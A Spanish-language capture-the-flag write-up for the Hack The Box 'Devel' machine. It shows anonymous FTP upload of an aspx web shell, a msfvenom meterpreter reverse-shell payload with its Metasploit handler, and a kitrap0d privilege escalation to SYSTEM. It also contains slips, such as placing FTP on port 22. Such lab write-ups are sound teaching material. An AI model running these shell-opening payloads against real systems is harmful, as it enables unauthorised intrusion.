Devel, aunque es relativamente simple, demuestra los riesgos de seguridad asociados con algunas configuraciones de programas predeterminadas. Es una máquina de nivel principiante que se puede completar utilizando exploits disponibles públicamente.  

Habilidades requeridas

-Conocimiento básico de Windows

-Enumeración de puertos y servicios 

-Identificación de servicios vulnerables

-Explotación de credenciales débiles

-Msfvenom

-Uso de exploits

-Técnicas básicas de escalada de privilegios de Windows

Enumeración: 

-Para comenzar lanzaremos una traza PING, para confirmar que la máquina está actica. 

>ping –c 3 10.10.10.5 

-La máquina nos responde, está activa. 

-Después lanzaremos un escaneo de puertos con nmap y exportaremos los datos al fichero grepeable allPorts: 

>nmap –p- –min-rate=5000 –open –n –v 10.10.10.5 -oG allPorts 

 

-Observamos que se han encontrado abiertos los puertos 21 ftp, y el 80 http. 

-Usamos la función extractPorts de S4vitar para tener la información ordenada, y a continuación realizaremos un escaneo con nmap para ver qué versiones y servicios corren bajo éstos puertos y exportaremos ésta información al fichero targeted: 

>nmap –sCV –p22,80 –v 10.10.10.5 -oN targeted 

-Lanzaremos un whatweb para ver si nos arroja algo más de información. 

EXPLOTACIÓN: 

Explotación Sin ninguna información detallada sobre la versión en el servidor FTP de Microsoft, deberá abordarse de manera diferente. En este caso, el método de entrada más probable parece ser una configuración incorrecta o credenciales de inicio de sesión débiles. Intentar conectarse de forma anónima a través de FTP revela que el servidor permite el inicio de sesión anónimo con privilegios de lectura/escritura en el directorio del servidor IIS. 

 

-Hemos visto que en el puerto 22 corre un servicio FTP, por lo que trataremos de conectarmos inicialmente usando credenciales anonymous por defecto, y usando el usuario anonymous y con contraseña vacía, vemos que nos podemos contectar. 

-Además vemos que tenemos capacidad de transferencia de archivos, por lo vamos a subir una consola de comandos interactiva, para poder ejecutar comandos de manera remota desde el navegador. 

-Para realizar esto debemos buscar el archivo (cmd.aspx) necesario y luego copiarlo en nuestro directorio actual de trabajo y por último subirlo a través de FTP: 

-Ahora lo subiremos con el comando put. 

Una vez está subido podemos llamarlo desde el navegador y ejecutar comandos: 

-Vemos que podemos hacer algunas búsquedas pero para obtener acceso a la máquina debemos usar metasploit. 

-Primero generaremos un payload con msfvenom y lo llamaremos shell.aspx 

 

>msfvenom –p windows/meterpreter/reverse_tcp LHOST=10.10.14.29 LPORT=1234 –f aspx > shell.aspx 

 

-Subiremos con el comando put nuestra shell por via FTP, y en el navegador la ejecutamos: 

>use exploit/multi/handler 

>set payload windows/meterpreter/reverse_tcp 

>set LHOST 10.10.14.29 

>set LPORT 1234 

>run 

(meterpreter)> cd &TEMP& 

(meterpreter)> background 

Cuando en el navegador damos a ENTER, en la consola donde estamos corriendo el exploit, nos devuelve la sesión de meterpreter, un avez aquí iremos al directorio TEMP y haremos ‘background’ para iniciar una sesión. 

-Una vez iniciada la sesión ejecutaremos un segundo exploit dentro para escalar privilegios. 

Escalada de privilegios  

Ejecutar sysinfo en la sesión de Meterpreter revela que el objetivo es la arquitectura x86, por lo que es posible obtener sugerencias bastante confiables con el módulo local_exploit_suggester.  

No se puede decir lo mismo de ejecutar el módulo en x64.  

Ejecutar el sugeridor brinda diferentes módulos de escalamiento recomendados, algunos no funcionan, por lo que recomiendo éste: 

 exploit/windows/local/ms10_015_kitrap0d  

(meterpreter)> use exploit/windows/local/ms10_015_kitrap0d 

>set LHOST 10.10.14.29 

>set LPORT 1234 

>set SESSION 1 

>run 

(meterpreter 2)> getuid 

NT AUTHORITY/SYSTEM 

(meterpreter 2)> shell 

 

C:\windows\TEMP>cd c:\Users\babis\Desktop 

C:\windows\TEMP \Users\babis\Desktop >type user.txt 

(Bandera 1) 

C:\windows\TEMP>cd c:\Users\Administrator\Desktop 

C:\windows\TEMP \Users\Administrator\Desktop >type root.txt 

(Bandera de Root) 

El módulo ms10_015_kitrap0d, funciona. Los indicadores ahora se pueden obtener de c:\Users\babis\Desktop\user.txt.txt y c:\Users\Administrator\Desktop\root.txt.txt 

 

 

FIN. 

HTB

srubi00000@gmail.com
Madrid, Spain